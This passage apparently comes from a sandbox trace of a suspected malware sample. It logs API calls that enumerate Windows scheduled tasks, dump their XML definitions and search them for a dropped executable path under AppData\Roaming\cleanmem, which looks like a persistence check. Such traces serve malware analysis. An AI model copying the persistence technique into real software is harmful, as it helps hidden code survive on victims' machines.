\r\n PT12H\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT10M\r\n PT2H\r\n false\r\n false\r\n \r\n \r\n PT2M\r\n 3\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n {BA677074-762C-444b-94C8-8C83F93F6605}\r\n \r\n \r\n") returned 0x0 [0139.206] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\User Profile Service\\HiveUploadTask\r\n 1.0\r\n D:P(A;;FA;;;BA)(A;;FA;;;SY)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-500)\r\n $(@%SystemRoot%\\system32\\profsvc,-501)\r\n \r\n \r\n \r\n 2007-08-28T00:00:00\r\n PT1H\r\n \r\n PT12H\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n false\r\n true\r\n true\r\n false\r\n true\r\n \r\n PT10M\r\n PT2H\r\n false\r\n false\r\n \r\n \r\n PT2M\r\n 3\r\n \r\n true\r\n true\r\n \r\n \r\n \r\n {BA677074-762C-444b-94C8-8C83F93F6605}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.207] IUnknown:Release (This=0x1270f0) returned 0x0 [0139.207] IUnknown:Release (This=0x126fb0) returned 0x0 [0139.207] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fb0) returned 0x0 [0139.208] ITaskFolderCollection:get_Count (in: This=0x126fb0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.208] IUnknown:Release (This=0x126fb0) returned 0x0 [0139.208] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.208] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x28, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.208] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126f90) returned 0x0 [0139.210] IRegisteredTaskCollection:get_Count (in: This=0x126f90, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.210] IRegisteredTaskCollection:get_Item (in: This=0x126f90, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270b0) returned 0x0 [0139.210] IRegisteredTask:get_Name (in: This=0x1270b0, pName=0x24da80 | out: pName=0x24da80*="ResolutionHost") returned 0x0 [0139.210] IRegisteredTask:get_Xml (in: This=0x1270b0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n $(@%systemroot%\\system32\\dps.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\dps.dll,-601)\r\n Microsoft\\Windows\\WDI\\ResolutionHost\r\n $(@%systemroot%\\system32\\dps.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n 10\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {900be39d-6be8-461a-bc4d-b0fa71f5ecb1}\r\n \r\n \r\n") returned 0x0 [0139.212] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%systemroot%\\system32\\dps.dll,-600)\r\n 1.0\r\n $(@%systemroot%\\system32\\dps.dll,-601)\r\n Microsoft\\Windows\\WDI\\ResolutionHost\r\n $(@%systemroot%\\system32\\dps.dll,-602)\r\n O:BAG:BAD:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;FR;;;IU)(A;;FRFX;;;S-1-5-80-2970612574-78537857-698502321-558674196-1451644582)\r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n PT0S\r\n true\r\n 10\r\n true\r\n \r\n \r\n \r\n S-1-5-4\r\n HighestAvailable\r\n \r\n \r\n \r\n \r\n {900be39d-6be8-461a-bc4d-b0fa71f5ecb1}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.212] IUnknown:Release (This=0x1270b0) returned 0x0 [0139.212] IUnknown:Release (This=0x126f90) returned 0x0 [0139.212] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126f90) returned 0x0 [0139.213] ITaskFolderCollection:get_Count (in: This=0x126f90, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.213] IUnknown:Release (This=0x126f90) returned 0x0 [0139.213] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.214] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x29, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.214] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fb0) returned 0x0 [0139.218] IRegisteredTaskCollection:get_Count (in: This=0x126fb0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.218] IRegisteredTaskCollection:get_Item (in: This=0x126fb0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127100) returned 0x0 [0139.219] IRegisteredTask:get_Name (in: This=0x127100, pName=0x24da80 | out: pName=0x24da80*="QueueReporting") returned 0x0 [0139.219] IRegisteredTask:get_Xml (in: This=0x127100, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting\r\n $(@%SystemRoot%\\system32\\wer.dll,-292)\r\n $(@%SystemRoot%\\system32\\wer.dll,-293)\r\n $(@%SystemRoot%\\system32\\wer.dll,-294)\r\n 1.0\r\n \r\n \r\n \r\n PT13M\r\n \r\n \r\n \r\n false\r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n 5\r\n \r\n false\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\wermgr.exe\r\n -queuereporting\r\n \r\n \r\n") returned 0x0 [0139.221] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)\r\n \\Microsoft\\Windows\\Windows Error Reporting\\QueueReporting\r\n $(@%SystemRoot%\\system32\\wer.dll,-292)\r\n $(@%SystemRoot%\\system32\\wer.dll,-293)\r\n $(@%SystemRoot%\\system32\\wer.dll,-294)\r\n 1.0\r\n \r\n \r\n \r\n PT13M\r\n \r\n \r\n \r\n false\r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n 5\r\n \r\n false\r\n false\r\n \r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n %windir%\\system32\\wermgr.exe\r\n -queuereporting\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.221] IUnknown:Release (This=0x127100) returned 0x0 [0139.221] IUnknown:Release (This=0x126fb0) returned 0x0 [0139.221] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fb0) returned 0x0 [0139.222] ITaskFolderCollection:get_Count (in: This=0x126fb0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.222] IUnknown:Release (This=0x126fb0) returned 0x0 [0139.222] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.222] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2a, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.222] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fc0) returned 0x0 [0139.229] IRegisteredTaskCollection:get_Count (in: This=0x126fc0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.229] IRegisteredTaskCollection:get_Item (in: This=0x126fc0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127110) returned 0x0 [0139.229] IRegisteredTask:get_Name (in: This=0x127110, pName=0x24da80 | out: pName=0x24da80*="BfeOnServiceStartTypeChange") returned 0x0 [0139.229] IRegisteredTask:get_Xml (in: This=0x127110, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n \\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2001)\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2002)\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'</Select></Query></QueryList>\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n 7\r\n Queue\r\n true\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n bfe.dll,BfeOnServiceStartTypeChange\r\n \r\n \r\n") returned 0x0 [0139.231] StrStrIW (lpFirst="\r\n\r\n \r\n \\Microsoft\\Windows\\Windows Filtering Platform\\BfeOnServiceStartTypeChange\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2001)\r\n $(@%SystemRoot%\\system32\\bfe.dll,-2002)\r\n \r\n \r\n \r\n S-1-5-18\r\n \r\n \r\n \r\n \r\n <QueryList><Query Id=\"0\" Path=\"System\"><Select Path=\"System\">*/System/Provider[@Name='Service Control Manager'] and */System/EventID='7040' and */EventData/Data[@Name='param4']='BFE'</Select></Query></QueryList>\r\n \r\n \r\n \r\n false\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n 7\r\n Queue\r\n true\r\n \r\n \r\n \r\n %windir%\\system32\\rundll32.exe\r\n bfe.dll,BfeOnServiceStartTypeChange\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.232] IUnknown:Release (This=0x127110) returned 0x0 [0139.232] IUnknown:Release (This=0x126fc0) returned 0x0 [0139.232] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fc0) returned 0x0 [0139.233] ITaskFolderCollection:get_Count (in: This=0x126fc0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.233] IUnknown:Release (This=0x126fc0) returned 0x0 [0139.233] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.233] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2b, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.233] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fb0) returned 0x0 [0139.235] IRegisteredTaskCollection:get_Count (in: This=0x126fb0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.235] IRegisteredTaskCollection:get_Item (in: This=0x126fb0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x127100) returned 0x0 [0139.235] IRegisteredTask:get_Name (in: This=0x127100, pName=0x24da80 | out: pName=0x24da80*="UpdateLibrary") returned 0x0 [0139.235] IRegisteredTask:get_Xml (in: This=0x127100, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"System\"\r\n >\r\n <Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n \"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n") returned 0x0 [0139.242] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft\\Windows\\Windows Media Sharing\\UpdateLibrary\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;AU)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1001)\r\n $(@%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe,-1002)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n <QueryList>\r\n <Query\r\n Id=\"0\"\r\n Path=\"System\"\r\n >\r\n <Select Path=\"System\">*[System[Provider[@Name='Microsoft-Windows-WMPNSS-Service'] and (EventID=14210)]]</Select>\r\n </Query>\r\n </QueryList>\r\n \r\n \r\n \r\n \r\n S-1-5-11\r\n \r\n \r\n \r\n \r\n \"%ProgramFiles%\\Windows Media Player\\wmpnscfg.exe\"\r\n \r\n \r\n \r\n true\r\n Parallel\r\n true\r\n false\r\n false\r\n true\r\n true\r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.243] IUnknown:Release (This=0x127100) returned 0x0 [0139.243] IUnknown:Release (This=0x126fb0) returned 0x0 [0139.243] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fb0) returned 0x0 [0139.244] ITaskFolderCollection:get_Count (in: This=0x126fb0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.244] IUnknown:Release (This=0x126fb0) returned 0x0 [0139.244] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.244] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2c, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.244] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fa0) returned 0x0 [0139.246] IRegisteredTaskCollection:get_Count (in: This=0x126fa0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.246] IRegisteredTaskCollection:get_Item (in: This=0x126fa0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270e0) returned 0x0 [0139.246] IRegisteredTask:get_Name (in: This=0x1270e0, pName=0x24da80 | out: pName=0x24da80*="ConfigNotification") returned 0x0 [0139.246] IRegisteredTask:get_Xml (in: This=0x1270e0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n Microsoft Corporation\r\n Microsoft Corporation\r\n This scheduled task notifies the user that Windows Backup has not been configured.\r\n Microsoft\\Windows\\WindowsBackup\\ConfigNotification\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2230524765-2343657310-2007128508-572789919-1856712407)\r\n \r\n \r\n \r\n 2010-11-28T10:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %systemroot%\\System32\\sdclt.exe\r\n /CONFIGNOTIFICATION\r\n \r\n \r\n") returned 0x0 [0139.249] StrStrIW (lpFirst="\r\n\r\n \r\n Microsoft Corporation\r\n Microsoft Corporation\r\n This scheduled task notifies the user that Windows Backup has not been configured.\r\n Microsoft\\Windows\\WindowsBackup\\ConfigNotification\r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;S-1-5-87-2230524765-2343657310-2007128508-572789919-1856712407)\r\n \r\n \r\n \r\n 2010-11-28T10:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-19\r\n LeastPrivilege\r\n InteractiveToken\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n true\r\n true\r\n false\r\n \r\n true\r\n false\r\n \r\n true\r\n true\r\n false\r\n false\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n %systemroot%\\System32\\sdclt.exe\r\n /CONFIGNOTIFICATION\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.250] IUnknown:Release (This=0x1270e0) returned 0x0 [0139.250] IUnknown:Release (This=0x126fa0) returned 0x0 [0139.250] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fa0) returned 0x0 [0139.251] ITaskFolderCollection:get_Count (in: This=0x126fa0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.251] IUnknown:Release (This=0x126fa0) returned 0x0 [0139.251] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.251] ITaskFolderCollection:get_Item (in: This=0x126e00, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2d, varVal2=0x0), ppFolder=0x24dbf0 | out: ppFolder=0x24dbf0*=0x12b5a0) returned 0x0 [0139.251] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24da70 | out: ppTasks=0x24da70*=0x126fb0) returned 0x0 [0139.253] IRegisteredTaskCollection:get_Count (in: This=0x126fb0, pCount=0x24dbd0 | out: pCount=0x24dbd0*=1) returned 0x0 [0139.253] IRegisteredTaskCollection:get_Item (in: This=0x126fb0, index=0x24dab0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24da60 | out: ppRegisteredTask=0x24da60*=0x1270f0) returned 0x0 [0139.253] IRegisteredTask:get_Name (in: This=0x1270f0, pName=0x24da80 | out: pName=0x24da80*="Calibration Loader") returned 0x0 [0139.253] IRegisteredTask:get_Xml (in: This=0x1270f0, pXml=0x24da68 | out: pXml=0x24da68*="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)\r\n \\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader\r\n $(@%SystemRoot%\\system32\\mscms.dll,-200)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-201)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-202)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n \r\n \r\n true\r\n ConsoleConnect\r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {B210D694-C8DF-490d-9576-9E20CDBC20BD}\r\n \r\n \r\n") returned 0x0 [0139.258] StrStrIW (lpFirst="\r\n\r\n \r\n D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FWFR;;;BU)\r\n \\Microsoft\\Windows\\WindowsColorSystem\\Calibration Loader\r\n $(@%SystemRoot%\\system32\\mscms.dll,-200)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-201)\r\n $(@%SystemRoot%\\system32\\mscms.dll,-202)\r\n 1.0\r\n \r\n \r\n \r\n true\r\n \r\n \r\n true\r\n ConsoleConnect\r\n \r\n \r\n \r\n Queue\r\n false\r\n false\r\n false\r\n false\r\n true\r\n false\r\n false\r\n false\r\n PT0S\r\n true\r\n \r\n \r\n \r\n S-1-5-32-545\r\n \r\n \r\n \r\n \r\n {B210D694-C8DF-490d-9576-9E20CDBC20BD}\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.258] IUnknown:Release (This=0x1270f0) returned 0x0 [0139.258] IUnknown:Release (This=0x126fb0) returned 0x0 [0139.258] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24da78 | out: ppFolders=0x24da78*=0x126fb0) returned 0x0 [0139.259] ITaskFolderCollection:get_Count (in: This=0x126fb0, pCount=0x24dbe8 | out: pCount=0x24dbe8*=0) returned 0x0 [0139.259] IUnknown:Release (This=0x126fb0) returned 0x0 [0139.259] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.259] IUnknown:Release (This=0x126e00) returned 0x0 [0139.259] TaskScheduler:IUnknown:Release (This=0x126d80) returned 0x0 [0139.259] ITaskFolderCollection:get_Item (in: This=0x126c40, index=0x24ddd0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), ppFolder=0x24dd80 | out: ppFolder=0x24dd80*=0x12b5a0) returned 0x0 [0139.260] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24dc00 | out: ppTasks=0x24dc00*=0x126dc0) returned 0x0 [0139.263] IRegisteredTaskCollection:get_Count (in: This=0x126dc0, pCount=0x24dd60 | out: pCount=0x24dd60*=1) returned 0x0 [0139.263] IRegisteredTaskCollection:get_Item (in: This=0x126dc0, index=0x24dc40*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24dbf0 | out: ppRegisteredTask=0x24dbf0*=0x126ef0) returned 0x0 [0139.263] IRegisteredTask:get_Name (in: This=0x126ef0, pName=0x24dc10 | out: pName=0x24dc10*="MP Scheduled Scan") returned 0x0 [0139.263] IRegisteredTask:get_Xml (in: This=0x126ef0, pXml=0x24dbf8 | out: pXml=0x24dbf8*="\r\n\r\n \r\n Scheduled Scan\r\n \r\n \r\n \r\n 2000-01-01T05:07:30\r\n 2100-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n PT0H1M0S\r\n PT4H0M0S\r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n c:\\program files\\windows defender\\MpCmdRun.exe\r\n Scan -ScheduleJob -WinTask -RestrictPrivilegesScan\r\n \r\n \r\n") returned 0x0 [0139.266] StrStrIW (lpFirst="\r\n\r\n \r\n Scheduled Scan\r\n \r\n \r\n \r\n 2000-01-01T05:07:30\r\n 2100-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n S-1-5-18\r\n HighestAvailable\r\n \r\n \r\n \r\n IgnoreNew\r\n true\r\n false\r\n true\r\n true\r\n false\r\n \r\n PT0H1M0S\r\n PT4H0M0S\r\n false\r\n false\r\n \r\n true\r\n true\r\n true\r\n true\r\n false\r\n true\r\n false\r\n PT72H\r\n 7\r\n \r\n \r\n \r\n c:\\program files\\windows defender\\MpCmdRun.exe\r\n Scan -ScheduleJob -WinTask -RestrictPrivilegesScan\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.266] IUnknown:Release (This=0x126ef0) returned 0x0 [0139.266] IUnknown:Release (This=0x126dc0) returned 0x0 [0139.266] ITaskFolder:GetFolders (in: This=0x12b5a0, flags=0, ppFolders=0x24dc08 | out: ppFolders=0x24dc08*=0x126dc0) returned 0x0 [0139.268] ITaskFolderCollection:get_Count (in: This=0x126dc0, pCount=0x24dd78 | out: pCount=0x24dd78*=0) returned 0x0 [0139.268] IUnknown:Release (This=0x126dc0) returned 0x0 [0139.268] TaskScheduler:IUnknown:Release (This=0x12b5a0) returned 0x0 [0139.268] IUnknown:Release (This=0x126c40) returned 0x0 [0139.268] TaskScheduler:IUnknown:Release (This=0x126bd0) returned 0x0 [0139.268] ITaskFolderCollection:get_Item (in: This=0x126b00, index=0x24df60*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x7fe00000002, varVal2=0x449cf8), ppFolder=0x24df10 | out: ppFolder=0x24df10*=0x12b5a0) returned 0x0 [0139.268] ITaskFolder:GetTasks (in: This=0x12b5a0, flags=1, ppTasks=0x24dd90 | out: ppTasks=0x24dd90*=0x126c20) returned 0x0 [0139.270] IRegisteredTaskCollection:get_Count (in: This=0x126c20, pCount=0x24def0 | out: pCount=0x24def0*=1) returned 0x0 [0139.270] IRegisteredTaskCollection:get_Item (in: This=0x126c20, index=0x24ddd0*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x24dd80 | out: ppRegisteredTask=0x24dd80*=0x126d60) returned 0x0 [0139.270] IRegisteredTask:get_Name (in: This=0x126d60, pName=0x24dda0 | out: pName=0x24dda0*="SvcRestartTask") returned 0x0 [0139.270] IRegisteredTask:get_Xml (in: This=0x126d60, pXml=0x24dd88 | out: pXml=0x24dd88*="\r\n\r\n \r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n 1.0\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-201)\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-20)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n LeastPrivilege\r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\sc.exe\r\n start osppsvc\r\n \r\n \r\n") returned 0x0 [0139.273] StrStrIW (lpFirst="\r\n\r\n \r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-200)\r\n 1.0\r\n $(@%ProgramFiles%\\Common Files\\Microsoft Shared\\OfficeSoftwareProtectionPlatform\\osppc.dll,-201)\r\n D:P(A;;FA;;;SY)(A;;FA;;;BA)(A;;FA;;;S-1-5-20)\r\n \r\n \r\n \r\n 2004-01-01T00:00:00\r\n true\r\n \r\n 1\r\n \r\n \r\n \r\n \r\n \r\n LeastPrivilege\r\n S-1-5-20\r\n \r\n \r\n \r\n IgnoreNew\r\n false\r\n false\r\n false\r\n true\r\n false\r\n \r\n PT10M\r\n PT1H\r\n true\r\n false\r\n \r\n true\r\n false\r\n true\r\n false\r\n false\r\n true\r\n false\r\n PT0S\r\n 7\r\n \r\n PT1M\r\n 3\r\n \r\n \r\n \r\n \r\n %systemroot%\\system32\\sc.exe\r\n start osppsvc\r\n \r\n \r\n", lpSrch="C:\\Users\\aETAdzjz\\AppData\\Roaming\\cleanmem\\fumezad.exe") returned 0x0 [0139.273] IUnknown:Release (This=0x126d60) returned 0x0 [0139.273] 